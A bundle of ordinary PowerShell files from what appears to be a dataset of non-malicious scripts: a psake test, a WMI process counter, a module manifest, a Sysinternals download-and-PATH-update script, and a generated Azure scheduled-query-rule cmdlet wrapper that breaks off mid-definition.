'' SIG '' gqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr
'' SIG '' 4A245oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvp
'' SIG '' e784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
'' SIG '' tB1VM1izoXBm8qGCA1YwggI+AgEBMIIBAaGB2aSB1jCB
'' SIG '' 0zELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0
'' SIG '' b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1p
'' SIG '' Y3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWlj
'' SIG '' cm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVk
'' SIG '' MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046NkIwNS0w
'' SIG '' NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l
'' SIG '' LVN0YW1wIFNlcnZpY2WiIwoBATAHBgUrDgMCGgMVABVP
'' SIG '' XkqXcbNGtOiRSLhhRyI/yPt+oIGDMIGApH4wfDELMAkG
'' SIG '' A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO
'' SIG '' BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
'' SIG '' dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0
'' SIG '' IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEL
'' SIG '' BQACBQDqyeLvMCIYDzIwMjQxMDI4MTAxNjE1WhgPMjAy
'' SIG '' NDEwMjkxMDE2MTVaMHQwOgYKKwYBBAGEWQoEATEsMCow
'' SIG '' CgIFAOrJ4u8CAQAwBwIBAAICFfowBwIBAAICEqAwCgIF
'' SIG '' AOrLNG8CAQAwNgYKKwYBBAGEWQoEAjEoMCYwDAYKKwYB
'' SIG '' BAGEWQoDAqAKMAgCAQACAwehIKEKMAgCAQACAwGGoDAN
'' SIG '' BgkqhkiG9w0BAQsFAAOCAQEAaVBVOPr2SRclJlW/lmVi
'' SIG '' GJvOcFpGqlEDCFw2vPQCUXRCDWQWGLiiWR8Bl3ryMnGq
'' SIG '' iOTHBoNvFJ15U/OflSx3EW9gakwapVA38ljAw0ouPzct
'' SIG '' aPooRaIYbP7o0LsZIdpbH7t3/ETvqx8r8qHOmlWKF6W7
'' SIG '' GLD7L1oZT+VSGN8lzu87QfU3b6F137EjCBoCDlETYwuf
'' SIG '' ph/q+EdIJIKzv/WZAUlmsfw6AEBhDgEMvbOln4T1vT08
'' SIG '' SAZI22JxMcPOI9T1v+2j1YWr86B309Hz+3ofXgjWPWsf
'' SIG '' gF6Gv6Tjq7hc6YzC9/96PVUYJasuo73AcTtIelH/RZKp
'' SIG '' x8IOwbDHCFoqrzGCBA0wggQJAgEBMIGTMHwxCzAJBgNV
'' SIG '' BAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD
'' SIG '' VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQg
'' SIG '' Q29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBU
'' SIG '' aW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB9oMvJmpUXSLB
'' SIG '' AAEAAAH2MA0GCWCGSAFlAwQCAQUAoIIBSjAaBgkqhkiG
'' SIG '' 9w0BCQMxDQYLKoZIhvcNAQkQAQQwLwYJKoZIhvcNAQkE
'' SIG '' MSIEIFMcY5ZBacsT7rlMDxIf8CnJtGa3iY6k6sLSuQWf
'' SIG '' GUP5MIH6BgsqhkiG9w0BCRACLzGB6jCB5zCB5DCBvQQg
'' SIG '' K2FM8ZRepuVEi0uH/DVy//GqDRFXbAmUZhfi5UIxtqIw
'' SIG '' gZgwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMK
'' SIG '' V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
'' SIG '' A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
'' SIG '' VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
'' SIG '' MAITMwAAAfaDLyZqVF0iwQABAAAB9jAiBCBa2gYJOMV2
'' SIG '' ozACOvK1EAsklDihg0XhAEFDgLr4SMMAJTANBgkqhkiG
'' SIG '' 9w0BAQsFAASCAgBMiuYFE/m6ocqGuL/y4/6FL253op7t
'' SIG '' vIxsvzPD+PHJasqb4pCfZ1qWvrl5ku2twC4t/9+LIZM0
'' SIG '' SSYonS2KeRbDJD51HVd6eCu8y8nuU1ExDdhdVCxN3odn
'' SIG '' 3uSkMjIeSW8KqBD1M4vjMGinRcsSMYhuHTXGBKYu3E1A
'' SIG '' SfqEmfkidNtWtPhD1UijHXZ1sS7o1rNvqiDLyaudjsK7
'' SIG '' CrZ3HnOWDFrFmUfg8oy7SOwOaZP7LJk+plIf9wn8V7pQ
'' SIG '' C/wDYdFtSacdGlTzxIdvT3st9WmnL/Ek1g86EobSKf/c
'' SIG '' TD48o6WJDqaNzYDdDFdIMsUeThvKWMyn3TuExFjoW5Y2
'' SIG '' K5IeFJj1VXPs7QkuB7mJFjJDgvzsHqMW9qdN8Bw4otVW
'' SIG '' NO2VQNAiYkAIYY9sYa5tjdhPeKxCaX0k8L0lRSpaGS25
'' SIG '' GdawNAyCcQzgxX8F3QYV0ugKfY/pU52wZ2NSDgJ8Pe04
'' SIG '' gs4KBBkMDHrdpFumMS7ivalJ421au4SJw3SBZE2qI25W
'' SIG '' 4/Hkzzhn5mTPfyv/294V2VRLutn62NN3eBTjirTzFSzp
'' SIG '' vLt6iS5MLNMpxBuLGU+4sqDLya9XFa7RJiyhSC16GDt9
'' SIG '' Puek9xjBHVh6l8HbsZH69a7T/NpVh1btYvolvK1AHlUP
'' SIG '' yM4eo7ziu3SJaHVcgrjydMICslI6m2z3lffmTw==
'' SIG '' End signature block
|
combined_dataset/train/non-malicious/2884.ps1
|
2884.ps1
|
Task default -depends Test
Task Test {
[string]$currentPath = Get-Location
[string]$parentPath = Split-Path $currentPath -Parent
[string[]]$global:locations = @()
[string[]]$expected = "$currentPath,$parentPath,$parentPath,$parentPath,$currentPath"
[scriptblock]$cmd = {
$global:locations += Get-Location
throw "forced error"
}
$global:locations += Get-Location
try {
Exec -cmd $cmd -maxRetries 2 -workingDirectory $parentPath
}
catch {}
$global:locations += Get-Location
[string]$actual = $global:locations -join ","
$actual = $actual.ToLower()
Assert ($actual -eq $expected) "Expected: '$expected' Actual: '$actual'"
}
|
combined_dataset/train/non-malicious/Get-ProcessCount.ps1
|
Get-ProcessCount.ps1
|
# Get-ProcessCount uses 2 main variables, server and process name.
# Process name is typically the end exe, such as "svchost.exe"
# Will accept unnamed args (Get-ProcessCount servername processname)
# or named args (Get-ProcessCount -Computer servername -Process processname)
Function Get-ProcessCount([string]$process, [string]$computer = "localhost", [switch]$guess) {
$i = 0
$procList = Get-WmiObject -Class Win32_Process -Computer $computer
foreach($proc in $procList) {
If($proc.name -eq $process)
{
$i++
}
}
Function Try-Guessing([string]$process) {
foreach($proc in $procList) {
If($proc.Name -match $process) {
$possible += @($($proc.name))
}
}
If($possible.Count -ge 1) {
$uniq = $possible | Get-Unique
foreach($proc in $uniq) {
Write-Host "Did you mean $($proc)?" -ForeGroundColor Magenta
}
} else {
Write-Host "I tried guessing, but I couldn't find $($process) that way, either. Sorry." -ForeGroundColor Green
}
}
If($i -ge 1) {
Write-Host "There are $i instances of $process on $computer" -ForegroundColor Green
} else {
Write-Host "0 instances of $process found on $computer" -ForegroundColor Green
Try-Guessing $process
}
}
|
combined_dataset/train/non-malicious/sample_62_52.ps1
|
sample_62_52.ps1
|
#
# Module manifest for module 'PowerShellProTools'
#
# Generated by: Ironman Software, LLC
#
# Generated on: 7/11/2024
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'PowerShellProTools.psm1'
# Version number of this module.
ModuleVersion = '2024.7.0'
# Supported PSEditions
# CompatiblePSEditions = @()
# ID used to uniquely identify this module
GUID = '7f781f38-edf7-478e-bf15-12913cc81da9'
# Author of this module
Author = 'Ironman Software, LLC'
# Company or vendor of this module
CompanyName = 'Unknown'
# Copyright statement for this module
Copyright = 'Ironman Software, LLC'
# Description of the functionality provided by this module
Description = 'PowerShell script packaging and Windows Forms design.'
# Minimum version of the PowerShell engine required by this module
# PowerShellVersion = ''
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
# RequiredModules = @()
# Assemblies that must be loaded prior to importing this module
# RequiredAssemblies = @()
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
NestedModules = @('PowerShellToolsPro.Cmdlets.dll')
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Merge-Script', 'Show-WinFormDesigner', 'ConvertTo-WinForm',
'Show-PSScriptPad'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
# Tags = @()
# A URL to the license for this module.
# LicenseUri = ''
# A URL to the main website for this project.
# ProjectUri = ''
# A URL to an icon representing this module.
# IconUri = ''
# ReleaseNotes of this module
ReleaseNotes = 'https://docs.poshtools.com/powershell-pro-tools-module'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/Get-Sysinternals_2.ps1
|
Get-Sysinternals_2.ps1
|
function Get-SysInternals {
param ( $sysIntDir=(join-path $env:systemroot "\\Sysinternals\\") )
if(!(Test-Path -Path $sysIntDir -PathType Container))
{
$null = New-Item -Type Directory -Path $sysIntDir -Force
}
$log = join-path $sysIntDir "changes.log"
Add-Content -force $log -value "`n`n[$(get-date)]SysInternals sync has been started"
net use \\\\live.sysinternals.com\\tools /persistent:no
New-PSDrive -Name SYS -PSProvider filesystem -Root \\\\live.sysinternals.com\\tools
dir Sys: -recurse | foreach {
$fileName = $_.name
$localFile = join-path $sysIntDir $_.name
$exist = test-path $localFile
$msgNew = "new utility found: $fileName , downloading..."
$msgUpdate = "file : $fileName is newer, updating..."
$msgNoChange = "nothing changed for: $fileName"
if($exist){
if($_.lastWriteTime -gt (Get-Item $localFile).lastWriteTime)
{
Copy-Item $_.fullname $sysIntDir -force
Write-Host $msgUpdate -fore yellow
Add-Content -force $log -value $msgUpdate
}
else
{
Add-Content $log -force -value $msgNoChange
Write-Host $msgNoChange
}
}
else
{
if($_.extension -eq ".exe")
{
Write-Host $msgNew -fore green
Add-Content -force $log -value $msgNew
}
Copy-Item $_.fullname $sysIntDir -force
}
}
Update-Path "Sysinternals" $sysIntDir ""
net use \\\\live.sysinternals.com\\tools\\ /delete
}
function Update-Path ( [string] $Product, [string] $productPath, [string] $Property)
{
# Get our existing path as an array
$pathArray = @()
foreach ($pathItem in [Environment]::GetEnvironmentVariable('Path', 'Machine').Split(';')) {
# Remove trailing \\ if any
$pathItem = $pathItem.TrimEnd(('\\'));
$pathItem = $pathItem.Replace('"',"");
#$pathItem =('"{0}"' -f $pathItem)
if ($pathArray -contains $pathItem) {
"Removing duplicate item: " + $pathItem;
}
else {
"Keeping item: " + $pathItem;
$pathArray += $pathItem
}
}
# Append new paths.
"test path "+$productPath
#TODO: encapsulate to a function
if (Test-Path $productPath) {
if ([string]::IsNullOrEmpty($Property)) {
[string] $path = $productPath
}
else {
[string] $path = (Get-ItemProperty $produuctPath).($Property)
}
#$path
if (-not [string]::IsNullOrEmpty($path)) {
$Product + " found"
$path = $path.TrimEnd(('\\'));
$path = $path.Replace('"',"");
#$path =('"{0}"' -f $path)
if ($pathArray -notcontains $path ) {
" Appending " + $path + " to path"
$pathArray += $path
}
else {
" " + $path + " already in path"
}
}
}
else {
$product + " not found"
}
[Array]::Sort([array]$pathArray)
#$pathArray
""
"Old Path: "
([Environment]::GetEnvironmentVariable('Path', 'Machine').Split(';'))|format-list
""
""
[string] $newPath = [string]::Join(';', $pathArray);
[Environment]::SetEnvironmentVariable('Path', $newPath, 'Machine');
"New Path: "
([Environment]::GetEnvironmentVariable('Path', 'Machine').Split(';'))|format-list
}
$wid=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$prp=new-object System.Security.Principal.WindowsPrincipal($wid)
$adm=[System.Security.Principal.WindowsBuiltInRole]::Administrator
$IsAdmin=$prp.IsInRole($adm)
if($IsAdmin)
{
if ($args.Length -eq 0)
{
Get-Sysinternals
}
else
{
Get-Sysinternals $args[0]
}
#Get-Sysinternals "c:\\sys\\"
}
else
{
Write-Warning "This script requires running as an elevated administrator."
}
|
combined_dataset/train/non-malicious/sample_49_22.ps1
|
sample_49_22.ps1
|
# ----------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code
# is regenerated.
# ----------------------------------------------------------------------------------
<#
.Synopsis
Retrieve an scheduled query rule definition.
.Description
Retrieve an scheduled query rule definition.
.Example
Get-AzScheduledQueryRule
.Example
Get-AzScheduledQueryRule -ResourceGroupName "test-group"
.Example
Get-AzScheduledQueryRule -ResourceGroupName "test-group" -Name "test-rule"
.Inputs
Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity
.Outputs
Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource
.Notes
COMPLEX PARAMETER PROPERTIES
To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables.
INPUTOBJECT <IScheduledQueryRuleIdentity>: Identity Parameter
[Id <String>]: Resource identity path
[ResourceGroupName <String>]: The name of the resource group. The name is case insensitive.
[RuleName <String>]: The name of the rule.
[SubscriptionId <String>]: The ID of the target subscription.
.Link
https://learn.microsoft.com/powershell/module/az.monitor/get-azscheduledqueryrule
#>
function Get-AzScheduledQueryRule {
[OutputType([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource])]
[CmdletBinding(DefaultParameterSetName='List', PositionalBinding=$false)]
param(
[Parameter(ParameterSetName='Get', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[System.String]
# The name of the rule.
${Name},
[Parameter(ParameterSetName='Get', Mandatory)]
[Parameter(ParameterSetName='List1', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[System.String]
# The name of the resource group.
# The name is case insensitive.
${ResourceGroupName},
[Parameter(ParameterSetName='Get')]
[Parameter(ParameterSetName='List')]
[Parameter(ParameterSetName='List1')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')]
[System.String[]]
# The ID of the target subscription.
${SubscriptionId},
[Parameter(ParameterSetName='GetViaIdentity', Mandatory, ValueFromPipeline)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity]
# Identity Parameter
# To construct, see NOTES section for INPUTOBJECT properties and create a hash table.
${InputObject},
[Parameter()]
[Alias('AzureRMContext', 'AzureCredential')]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Azure')]
[System.Management.Automation.PSObject]
# The DefaultProfile parameter is not functional.
# Use the SubscriptionId parameter when available if executing the cmdlet against a different subscription.
${DefaultProfile},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Wait for .NET debugger to attach
${Break},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be appended to the front of the pipeline
${HttpPipelineAppend},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be prepended to the front of the pipeline
${HttpPipelinePrepend},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Uri]
# The URI for the proxy server to use
${Proxy},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.PSCredential]
# Credentials for a proxy server to use for the remote call
${ProxyCredential},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Use the default credentials for the proxy
${ProxyUseDefaultCredentials}
)
begin {
try {
$outBuffer = $null
if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) {
$PSBoundParameters['OutBuffer'] = 1
}
$parameterSet = $PSCmdlet.ParameterSetName
if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) {
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString()
}
$preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
if ($preTelemetryId -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString()
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet)
} else {
$internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
if ($internalCalledCmdlets -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name
} else {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal'
}
$mapping = @{
Get = 'Az.ScheduledQueryRule.private\Get-AzScheduledQueryRule_Get';
GetViaIdentity = 'Az.ScheduledQueryRule.private\Get-AzScheduledQueryRule_GetViaIdentity';
List = 'Az.ScheduledQueryRule.private\Get-AzScheduledQueryRule_List';
List1 = 'Az.ScheduledQueryRule.private\Get-AzScheduledQueryRule_List1';
}
if (('Get', 'List', 'List1') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) {
$testPlayback = $false
$PSBoundParameters['HttpPipelinePrepend'] | Foreach-Object { if ($_) { $testPlayback = $testPlayback -or ('Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.PipelineMock' -eq $_.Target.GetType().FullName -and 'Playback' -eq $_.Target.Mode) } }
if ($testPlayback) {
$PSBoundParameters['SubscriptionId'] = . (Join-Path $PSScriptRoot '..' 'utils' 'Get-SubscriptionIdTestSafe.ps1')
} else {
$PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id
}
}
$cmdInfo = Get-Command -Name $mapping[$parameterSet]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name)
}
$wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet)
$scriptCmd = {& $wrappedCmd @PSBoundParameters}
$steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin)
$steppablePipeline.Begin($PSCmdlet)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
process {
try {
$steppablePipeline.Process($_)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
finally {
$backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
$backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
}
end {
try {
$steppablePipeline.End()
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets
if ($preTelemetryId -eq '') {
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
}
<#
.Synopsis
Creates or updates a scheduled query rule.
.Description
Creates or updates a scheduled query rule.
.Example
$subscriptionId=(Get-AzContext).Subscription.Id
$dimension = New-AzScheduledQueryRuleDimensionObject -Name Computer -Operator Include -Value *
$condition=New-AzScheduledQueryRuleConditionObject -Dimension $dimension -Query "Perf | where ObjectName == `"Processor`" and CounterName == `"% Processor Time`" | summarize AggregatedValue = avg(CounterValue) by bin(TimeGenerated, 5m), Computer" -TimeAggregation "Average" -MetricMeasureColumn "AggregatedValue" -Operator "GreaterThan" -Threshold "70" -FailingPeriodNumberOfEvaluationPeriod 1 -FailingPeriodMinFailingPeriodsToAlert 1
New-AzScheduledQueryRule -Name test-rule -ResourceGroupName test-group -Location eastus -DisplayName test-rule -Scope "/subscriptions/$subscriptionId/resourceGroups/test-group/providers/Microsoft.Compute/virtualMachines/test-vm" -Severity 4 -WindowSize ([System.TimeSpan]::New(0,10,0)) -EvaluationFrequency ([System.TimeSpan]::New(0,5,0)) -CriterionAllOf $condition
.Outputs
Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource
.Notes
COMPLEX PARAMETER PROPERTIES
To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables.
CRITERIONALLOF <ICondition[]>: A list of conditions to evaluate against the specified scopes
[Dimension <IDimension[]>]: List of Dimensions conditions
Name <String>: Name of the dimension
Operator <DimensionOperator>: Operator for dimension values
Value <String[]>: List of dimension values
[FailingPeriodMinFailingPeriodsToAlert <Int64?>]: The number of violations to trigger an alert. Should be smaller or equal to numberOfEvaluationPeriods. Default value is 1
[FailingPeriodNumberOfEvaluationPeriod <Int64?>]: The number of aggregated lookback points. The lookback time window is calculated based on the aggregation granularity (windowSize) and the selected number of aggregated points. Default value is 1
[MetricMeasureColumn <String>]: The column containing the metric measure number. Relevant only for rules of the kind LogAlert.
[MetricName <String>]: The name of the metric to be sent. Relevant and required only for rules of the kind LogToMetric.
[Operator <ConditionOperator?>]: The criteria operator. Relevant and required only for rules of the kind LogAlert.
[Query <String>]: Log query alert
[ResourceIdColumn <String>]: The column containing the resource id. The content of the column must be a uri formatted as resource id. Relevant only for rules of the kind LogAlert.
[Threshold <Double?>]: the criteria threshold value that activates the alert. Relevant and required only for rules of the kind LogAlert.
[TimeAggregation <TimeAggregation?>]: Aggregation type. Relevant and required only for rules of the kind LogAlert.
.Link
https://learn.microsoft.com/powershell/module/az.monitor/new-azscheduledqueryrule
#>
function New-AzScheduledQueryRule {
[OutputType([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource])]
[CmdletBinding(DefaultParameterSetName='CreateExpanded', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')]
param(
[Parameter(Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[System.String]
# The name of the rule.
${Name},
[Parameter(Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[System.String]
# The name of the resource group.
# The name is case insensitive.
${ResourceGroupName},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')]
[System.String]
# The ID of the target subscription.
${SubscriptionId},
[Parameter(Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String]
# The geo-location where the resource lives
${Location},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IActionsCustomProperties]))]
[System.Collections.Hashtable]
# The properties of an alert payload.
${ActionCustomProperty},
[Parameter()]
[AllowEmptyCollection()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String[]]
# Action Group resource Ids to invoke when the alert fires.
${ActionGroupResourceId},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Management.Automation.SwitchParameter]
# The flag that indicates whether the alert should be automatically resolved or not.
# The default is true.
# Relevant only for rules of the kind LogAlert.
${AutoMitigate},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Management.Automation.SwitchParameter]
# The flag which indicates whether this scheduled query rule should be stored in the customer's storage.
# The default is false.
# Relevant only for rules of the kind LogAlert.
${CheckWorkspaceAlertsStorageConfigured},
[Parameter()]
[AllowEmptyCollection()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.ICondition[]]
# A list of conditions to evaluate against the specified scopes
# To construct, see NOTES section for CRITERIONALLOF properties and create a hash table.
${CriterionAllOf},
[Parameter()]
